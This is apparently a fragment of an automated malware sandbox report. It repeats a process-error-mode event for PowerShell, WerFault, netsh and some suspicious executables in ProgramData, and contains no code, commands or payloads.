      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
